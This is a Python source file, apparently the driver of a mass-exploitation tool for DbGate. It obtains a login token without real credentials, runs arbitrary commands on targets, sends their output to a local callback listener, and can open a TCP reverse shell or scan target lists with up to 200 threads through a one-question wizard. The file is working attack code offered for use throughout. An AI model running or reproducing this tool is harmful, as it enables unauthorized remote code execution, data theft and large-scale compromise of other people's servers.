self.timeout: float = DEFAULT_TIMEOUT
self.verify_ssl: bool = False
self.async_exec: bool = False
self.b64_exfil: bool = True
self.wait_exfil: float = 8.0
self.use_callback: bool = True
self.callback_url: Optional[str] = None
self.listen_bind: str = "0.0.0.0"
self.listen_port: int = DEFAULT_CALLBACK_PORT
self.callback_host: str = ""
self.use_builtin_listener: bool = True
self.resolved_targets: List[str] = []
self.target_commands: Dict[str, str] = {}
self.reverse_shell: bool = False
self.revsh_lhost: str = ""
self.revsh_lport: int = DEFAULT_REVSH_PORT
self.revsh_bind: str = "0.0.0.0"
self.wait_revsh: float = 15.0
self.revsh_interactive: bool = False
self.mass_wait_exfil: float = 8.0
def detect_target_input(raw: str) -> Tuple[str, str, str]:
    """Classify one line of user input as a single URL or a target-list file.

    Accepted shapes: ``target``, ``target|command`` and ``@file`` (an optional
    leading ``@`` marks a list file and is stripped).

    Args:
        raw: The text the user typed; may be empty.

    Returns:
        ``(mode, target, command)`` where *mode* is ``"single"`` or ``"mass"``,
        *target* is the URL or file path, and *command* is the text after the
        first ``|`` (empty when absent).
    """
    # Kept as a literal so the function stays self-contained; it mirrors the
    # default shown by the wizard prompt.
    fallback_url = "http://127.0.0.1:3000"

    # Only the first "|" separates target from command, so the command itself
    # may contain pipes.
    target, _, command = raw.strip().partition("|")
    target = target.strip()
    command = command.strip()
    if target.startswith("@"):
        target = target[1:].strip()

    # Check emptiness AFTER stripping "|command" and "@": input such as
    # "|ls" or "@" must fall back to the default instead of yielding "".
    if not target:
        return "single", fallback_url, command

    is_url = re.match(r"^https?://", target, re.I) is not None
    # An existing file always wins; otherwise a non-URL ending in .txt
    # (any letter case) is assumed to be a list file that may not exist yet.
    if os.path.isfile(target) or (not is_url and target.lower().endswith(".txt")):
        return "mass", target, command
    return "single", target, command
def apply_auto_defaults(cfg: RunConfig) -> None:
    """Overwrite *cfg* with the wizard's fixed settings (no further prompts).

    ``mode``, ``url`` and ``targets_file`` are left untouched; the caller sets
    those from the user's answer.
    """
    fixed = {
        "login_body": {"amoid": "none"},
        "token": None,
        "default_port": DEFAULT_PORT,
        "timeout": DEFAULT_TIMEOUT,
        "verify_ssl": False,
        "vector": "both",
        "check_only": False,
        "command": "id",
        "async_exec": False,
        "b64_exfil": True,
        "wait_exfil": 8.0,
        "use_callback": True,
        "use_builtin_listener": True,
        "listen_bind": "0.0.0.0",
        "listen_port": DEFAULT_CALLBACK_PORT,
        "threads": DEFAULT_CONCURRENCY,
        "mass_wait_exfil": 8.0,
    }
    for attr, value in fixed.items():
        setattr(cfg, attr, value)

    # The callback URL is derived from the guessed local address and the
    # listener port assigned above, so it must come last.
    cfg.callback_host = guess_lan_ip()
    cfg.callback_url = build_callback_url(cfg.callback_host, cfg.listen_port)
def print_auto_summary(cfg: RunConfig) -> None:
    """Print the effective wizard configuration, framed by blank lines."""
    if cfg.mode == "mass":
        rows = [
            f" Mode : mass file={cfg.targets_file}",
            f" Threads : {cfg.threads}",
        ]
    else:
        rows = [f" Mode : single target={cfg.url}"]
    rows.extend(
        [
            " Auth : POST /auth/login → Bearer (automatic)",
            f" Command : {cfg.command}",
            f" Vector : {cfg.vector}",
            f" Callback : {cfg.callback_url}",
            f" Listener : {cfg.listen_bind}:{cfg.listen_port}",
        ]
    )

    print()
    log_info("AUTO configuration")
    for row in rows:
        log_info(row)
    print()
def run_wizard() -> RunConfig:
    """Interactive entry point: ask one question and build a RunConfig.

    The answer may be a URL, a list file, or ``target|command``. Exits with
    status 1 when a list file is named but does not exist.
    """
    show_banner()
    log_info("AUTO — one question (optional: URL|command e.g. http://ip:3000|ls -la)")
    answer = ask("Target URL or list.txt", "http://127.0.0.1:3000")
    mode, target, extra_cmd = detect_target_input(answer)

    cfg = RunConfig()
    cfg.mode = mode
    if mode != "mass":
        cfg.url = ensure_target_url(target, DEFAULT_PORT)
    else:
        cfg.targets_file = target
        if not os.path.isfile(cfg.targets_file):
            log_fail(f"List file not found: {cfg.targets_file}")
            sys.exit(1)

    apply_auto_defaults(cfg)
    # A command typed after "|" overrides the default set just above.
    if extra_cmd:
        cfg.command = extra_cmd
    print_auto_summary(cfg)
    return cfg
async def preflight_verify(cfg: RunConfig) -> bool:
    """Validate the configuration and environment before anything is sent.

    Populates ``cfg.resolved_targets`` (and ``cfg.target_commands`` in mass
    mode) as a side effect.

    Returns:
        True when the run may proceed, False when a critical check failed
        (the reason has already been logged).
    """
    log_info("═══ Preflight verification ═══")
    init_nx_output()

    if cfg.mode != "mass":
        if not cfg.url:
            log_fail("No target URL")
            return False
        cfg.resolved_targets = [cfg.url]
        log_info(f"Target normalized: {cfg.url}")
    else:
        list_path = cfg.targets_file
        if not os.path.isfile(list_path):
            log_fail(f"List file missing: {list_path}")
            return False
        urls, per_cmds, stats, errors = load_targets_smart(list_path, cfg.default_port)
        write_list_report(
            list_path,
            stats,
            urls,
            errors,
            default_port=cfg.default_port,
            per_cmds=per_cmds,
        )
        cfg.resolved_targets = urls
        cfg.target_commands = per_cmds
        if per_cmds:
            log_info(f"Per-target commands: {len(per_cmds)} line(s) with |command")
        log_info(
            f"List: raw={stats.raw} resolved={stats.resolved} "
            f"dup={stats.dup} invalid={stats.invalid} → {OUT_LIST_REPORT}"
        )
        if stats.resolved == 0:
            log_fail("No valid targets after parsing list — fix list_report.txt")
            return False
        if stats.invalid > 0:
            log_warn(f"{stats.invalid} invalid lines — see {OUT_LIST_REPORT}")

    active = not cfg.check_only

    if active and cfg.reverse_shell:
        log_info(
            f"Revsh: target should connect to {cfg.revsh_lhost}:{cfg.revsh_lport} "
            f"(listener bind {cfg.revsh_bind})"
        )
        if cfg.mode != "single":
            log_fail("--reverse-shell supports single target (-u) only")
            return False

    loopback_callback = cfg.callback_host in ("127.0.0.1", "localhost")
    if active and cfg.use_callback and not cfg.reverse_shell and loopback_callback:
        # A loopback callback address cannot be reached from another host.
        tgt = cfg.url or (cfg.resolved_targets[0] if cfg.resolved_targets else "")
        if tgt and "127.0.0.1" not in tgt and "localhost" not in tgt:
            log_warn(
                "Callback host is localhost but target looks remote — "
                "exfil may fail; set LAN IP in --callback-host"
            )

    if cfg.mode == "single" and cfg.url and not cfg.token:
        log_info("Preflight: testing target reachability + auto-login...")
        reachable = await prefetch_token(cfg)
        if not reachable:
            log_fail("Preflight failed: cannot reach target or obtain token")
            return False

    log_ok("Preflight passed — starting scan")
    print()
    return True
async def prefetch_token(cfg: RunConfig) -> bool:
    """Obtain a Bearer token up front for a single target.

    Nothing is done (and True is returned) when a token is already set or no
    URL is configured. On success the token is stored in ``cfg.token``.

    Returns:
        False when the target is unreachable or the login did not yield a
        token, True otherwise.
    """
    if cfg.token or not cfg.url:
        return True

    client = DbGateExploit(
        cfg.url,
        timeout=cfg.timeout,
        verify_ssl=cfg.verify_ssl,
        login_body=cfg.login_body or {"amoid": "none"},
    )
    # One short-lived session with a single connection is enough here.
    connector = aiohttp.TCPConnector(ssl=cfg.verify_ssl, limit=1)
    async with aiohttp.ClientSession(connector=connector) as session:
        alive = await client.probe_alive(session)
        if not alive:
            log_fail(f"[{client.tag}] cannot reach target for login")
            return False
        got_token = await client.obtain_token(session)
        if not got_token:
            return False
        cfg.token = client.token
        return True
def write_session_summary(cfg: RunConfig, stats: Dict[str, int]) -> None:
    """Write a JSON summary of the run to ``OUT_SUMMARY``.

    Args:
        cfg: The configuration the run used.
        stats: Result counters keyed by outcome name.

    Writing is best-effort: a failure never aborts the run, but it is
    reported with a warning instead of being silently dropped, so a missing
    summary file can be explained.
    """
    doc = {
        "session": SESSION_ID,
        "mode": cfg.mode,
        "command": cfg.command,
        "vector": cfg.vector,
        "callback": cfg.callback_url,
        "reverse_shell": cfg.reverse_shell,
        "revsh_lhost": cfg.revsh_lhost,
        "revsh_lport": cfg.revsh_lport,
        "targets": cfg.resolved_targets,
        "stats": stats,
        "output_dir": os.path.abspath(OUT_DIR),
    }
    try:
        with open(OUT_SUMMARY, "w", encoding="utf-8") as fh:
            json.dump(doc, fh, indent=2)
    except OSError as exc:
        # Also covers an empty OUT_SUMMARY path (output tree not initialised).
        log_warn(f"Cannot write summary {OUT_SUMMARY}: {exc}")
        return
    log_info(f"Summary → {OUT_SUMMARY}")
def _stop_listeners(exfil_srv: Optional[HTTPServer], revsh_listener: Any) -> None:
    """Best-effort teardown of whichever local listeners were started."""
    if exfil_srv is not None:
        try:
            # shutdown() stops the serve loop; server_close() releases the
            # listening socket. Assumes the helper that created the server
            # runs serve_forever() in a background thread — TODO confirm.
            exfil_srv.shutdown()
            exfil_srv.server_close()
        except Exception as exc:  # cleanup must never mask the real outcome
            log_warn(f"Exfil listener shutdown failed: {exc}")
    if revsh_listener is not None:
        revsh_listener.close()


def _log_single_outcome(cfg: RunConfig, result: str) -> None:
    """Log the final verdict for a single-target run, with follow-up hints."""
    log_ok(f"Final result: {result.upper()} — {describe_result(result)}")
    if result == "exfil":
        log_ok(f"Per-target exfil → {nx_exfil_path(cfg.url)}")
    elif result == "revsh":
        if cfg.revsh_interactive:
            log_ok("Reverse TCP session ended — see Nx/revsh.txt")
        else:
            log_ok(
                "Reverse TCP verified (connection only) — see Nx/revsh.txt; "
                "add --revsh-interactive or use: nc -lvnp PORT"
            )
    elif result == "dispatch":
        if cfg.reverse_shell:
            log_warn(
                "Not confirmed: no TCP reverse connection. "
                "Use an IP reachable from DbGate (Docker: host gateway, not 127.0.0.1)."
            )
        else:
            log_warn(
                "Not confirmed: runner accepted the job but no output hit the listener. "
                "Try --callback-host with an IP reachable from the DbGate container."
            )


async def run_from_config(cfg: RunConfig) -> None:
    """Run one session described by *cfg* (single target or mass mode).

    Steps: preflight checks, start whichever local listener the mode needs,
    run the single-target chain or the mass scan, log and persist a summary.

    Exits the process with status 1 when preflight fails or a listener
    cannot be started. Any listener that was started is torn down on every
    exit path (normal return, early exit, or exception) via ``finally``.
    """
    if not await preflight_verify(cfg):
        sys.exit(1)

    exfil_srv: Optional[HTTPServer] = None
    revsh_listener: Optional[TcpRevshListener] = None
    callback_url = cfg.callback_url
    active = not cfg.check_only

    try:
        if cfg.reverse_shell and active:
            if cfg.mode != "single":
                log_fail("--reverse-shell: use -u for one target only")
                sys.exit(1)
            try:
                revsh_listener = TcpRevshListener(cfg.revsh_bind, cfg.revsh_lport)
                actual_revsh_port = revsh_listener.start()
                # The command is built from the port start() reported, which
                # may differ from the requested one.
                cfg.revsh_lport = actual_revsh_port
                cfg.command = build_reverse_shell_cmd(cfg.revsh_lhost, actual_revsh_port)
                log_ok(
                    f"Revsh dial address (from target): "
                    f"{cfg.revsh_lhost}:{actual_revsh_port}"
                )
            except OSError as exc:
                log_fail(f"Cannot start reverse-shell listener: {exc}")
                sys.exit(1)

        if (
            cfg.use_builtin_listener
            and cfg.use_callback
            and active
            and not cfg.reverse_shell
        ):
            try:
                exfil_srv, actual_port = start_exfil_server(
                    cfg.listen_bind, cfg.listen_port
                )
                cfg.listen_port = actual_port
                callback_url = build_callback_url(
                    cfg.callback_host or guess_lan_ip(), actual_port
                )
                cfg.callback_url = callback_url
                log_ok(f"Callback URL (target must reach this): {callback_url}")
                log_info(f"Listener bind: {cfg.listen_bind}:{actual_port}")
            except OSError as exc:
                log_fail(f"Cannot start exfil listener: {exc}")
                sys.exit(1)

        command = "" if cfg.check_only else cfg.command

        if cfg.mode == "single":
            client = DbGateExploit(
                cfg.url,
                timeout=cfg.timeout,
                verify_ssl=cfg.verify_ssl,
                token=cfg.token,
                login_body=cfg.login_body,
            )
            result = await client.full_chain(
                command=command,
                callback_url=callback_url if cfg.use_callback else None,
                vector=cfg.vector,
                check_only=cfg.check_only,
                async_exec=cfg.async_exec or cfg.reverse_shell,
                b64_exfil=cfg.b64_exfil,
                wait_exfil=cfg.wait_exfil,
                use_reverse_shell=cfg.reverse_shell,
                wait_revsh=cfg.wait_revsh,
                revsh_listener=revsh_listener,
                revsh_interactive=cfg.revsh_interactive,
            )
            stats: Dict[str, int] = {
                "exfil": 0, "dispatch": 0, "vuln": 0, "fail": 0, "revsh": 0,
            }
            stats[result] = stats.get(result, 0) + 1
            write_session_summary(cfg, stats)
            _log_single_outcome(cfg, result)
            return

        targets = cfg.resolved_targets
        if active and cfg.use_callback and not callback_url:
            log_warn("Mass mode without callback — blind dispatch only")
        log_info(
            f"Mass scan: {len(targets)} targets threads={cfg.threads} "
            f"vector={cfg.vector}"
        )
        stats = await mass_scan(
            targets,
            command,
            callback_url if cfg.use_callback else None,
            cfg.vector,
            cfg.check_only,
            max(1, min(cfg.threads, 200)),
            cfg.timeout,
            cfg.verify_ssl,
            cfg.token,
            cfg.login_body,
            cfg.async_exec,
            cfg.b64_exfil,
            cfg.wait_exfil if len(targets) == 1 else cfg.mass_wait_exfil,
            cfg.target_commands,
        )
        print(Fore.MAGENTA + "─" * 80 + Style.RESET_ALL)
        log_ok(
            f"Done EXFIL={stats.get('exfil', 0)} DISPATCH={stats.get('dispatch', 0)} "
            f"VULN={stats.get('vuln', 0)} FAIL={stats.get('fail', 0)}"
        )
        log_ok(f"Results in {os.path.abspath(OUT_DIR)}/")
        write_session_summary(cfg, stats)
    finally:
        _stop_listeners(exfil_srv, revsh_listener)
# ── optional CLI mode (--cli) ─────────────────────────────────────────────────
def build_arg_parser() -> argparse.ArgumentParser:
    """Build the argparse parser for the optional ``--cli`` mode.

    Without ``--cli`` the script runs the interactive wizard and the other
    flags are not consulted.
    """
    parser = argparse.ArgumentParser(
        description="DbGate assessment — use without --cli for wizard"
    )
    add = parser.add_argument

    # Mode switch and target selection
    add("--cli", action="store_true", help="Use command-line flags instead of wizard")
    add("-u", "--url")
    add("-f", "--file", default=DEFAULT_TARGETS)

    # Callback, command and authentication
    add("-c", "--callback")
    add("--cmd", "--command", dest="command", default="id")
    add("--check-only", action="store_true")
    add("--vector", choices=DbGateExploit.VECTORS, default="functionName")
    add("--token")
    add("--login-json", default='{"amoid":"none"}')

    # Transport tuning
    add("-t", "--threads", type=int, default=DEFAULT_CONCURRENCY)
    add("--timeout", type=float, default=DEFAULT_TIMEOUT)
    add("--port", type=int, default=DEFAULT_PORT)

    # Built-in callback listener
    add("--listen-host", default="0.0.0.0")
    add("--listen-port", type=int, default=DEFAULT_CALLBACK_PORT)
    add("--callback-host", help="IP/hostname targets use to reach your listener")
    add("--async-exec", action="store_true")
    add("--no-b64", action="store_true")
    add("--wait-exfil", type=float, default=8.0)

    # Reverse TCP mode
    add(
        "--reverse-shell",
        nargs="?",
        const="AUTO",
        metavar="LHOST:LPORT",
        help="TCP reverse shell (single -u only). Default: guessed LAN IP:4444",
    )
    add(
        "--revsh-bind",
        default="0.0.0.0",
        help="Local bind address for reverse-shell listener",
    )
    add(
        "--revsh-port",
        type=int,
        default=DEFAULT_REVSH_PORT,
        help="Local port when --reverse-shell has no LHOST:LPORT (default 4444)",
    )
    add(
        "--wait-revsh",
        type=float,
        default=15.0,
        help="Seconds to wait for reverse TCP after dispatch",
    )
    add(
        "--revsh-interactive",
        action="store_true",
        help="After reverse TCP connect, relay stdin/stdout (basic; nc is better for TTY)",
    )

    # Mass mode and TLS
    add(
        "--mass-wait-exfil",
        type=float,
        default=8.0,
        help="Per-target exfil wait in mass mode (default 8s; was capped at 3s)",
    )
    add("--secure", action="store_true", help="Enable TLS certificate verification")
    return parser
async def run_from_cli(args: argparse.Namespace) -> None:
    """Translate parsed ``--cli`` flags into a RunConfig and run it.

    Exits with status 1 on an invalid ``--login-json`` value or an invalid
    ``--reverse-shell`` combination/endpoint.
    """
    login_body, login_err = parse_login_json(args.login_json)
    if login_err:
        log_fail(login_err)
        sys.exit(1)

    cfg = RunConfig()
    # A URL selects single-target mode; otherwise the list file is used.
    if args.url:
        cfg.mode = "single"
        cfg.url = ensure_target_url(args.url, args.port)
    else:
        cfg.mode = "mass"
        cfg.url = ""
    cfg.targets_file = args.file
    cfg.default_port = args.port
    cfg.check_only = args.check_only
    cfg.command = args.command
    cfg.vector = args.vector
    cfg.token = args.token
    cfg.login_body = login_body
    cfg.threads = args.threads
    cfg.timeout = args.timeout
    cfg.verify_ssl = args.secure
    cfg.async_exec = args.async_exec
    cfg.b64_exfil = not args.no_b64
    cfg.wait_exfil = args.wait_exfil
    cfg.mass_wait_exfil = args.mass_wait_exfil

    if args.reverse_shell is None:
        # Callback mode: use the caller's URL or the built-in listener.
        custom_callback = bool(args.callback)
        cfg.use_callback = custom_callback or (
            not args.check_only and bool(args.command)
        )
        cfg.callback_url = args.callback
        cfg.listen_bind = args.listen_host
        cfg.listen_port = args.listen_port
        cfg.use_builtin_listener = not custom_callback and not args.check_only
        if cfg.use_builtin_listener:
            cfg.callback_host = args.callback_host or guess_lan_ip()
            if not cfg.callback_url:
                cfg.callback_url = build_callback_url(
                    cfg.callback_host, cfg.listen_port
                )
    else:
        if not args.url:
            log_fail("--reverse-shell requires a single target: -u http://host:3000")
            sys.exit(1)
        if args.check_only:
            log_fail("--reverse-shell cannot be used with --check-only")
            sys.exit(1)
        try:
            lhost, lport = parse_revsh_endpoint(args.reverse_shell, args.revsh_port)
        except (ValueError, OSError) as exc:
            log_fail(f"Invalid --reverse-shell endpoint: {exc}")
            sys.exit(1)
        cfg.reverse_shell = True
        cfg.revsh_lhost = args.callback_host or lhost
        cfg.revsh_lport = lport
        cfg.revsh_bind = args.revsh_bind
        cfg.wait_revsh = args.wait_revsh
        cfg.revsh_interactive = args.revsh_interactive
        # Reverse TCP mode replaces the HTTP callback path entirely.
        cfg.use_callback = False
        cfg.use_builtin_listener = False
        cfg.async_exec = True
        cfg.command = ""  # built after listener bind in run_from_config
        log_info(f"Reverse shell mode → target dials {cfg.revsh_lhost}:{cfg.revsh_lport}")

    await run_from_config(cfg)
async def async_main() -> None:
    """Parse the command line and run either the wizard or the CLI flow."""
    args = build_arg_parser().parse_args()
    if not args.cli:
        # Default: interactive wizard.
        await run_from_config(run_wizard())
        return
    show_banner()
    await run_from_cli(args)
def main() -> None:
    """Synchronous entry point: run the async flow, exiting quietly on Ctrl-C."""
    try:
        asyncio.run(async_main())
    except KeyboardInterrupt:
        # Finish the interrupted console line before the notice.
        print()
        log_warn("Interrupted")


if __name__ == "__main__":
    main()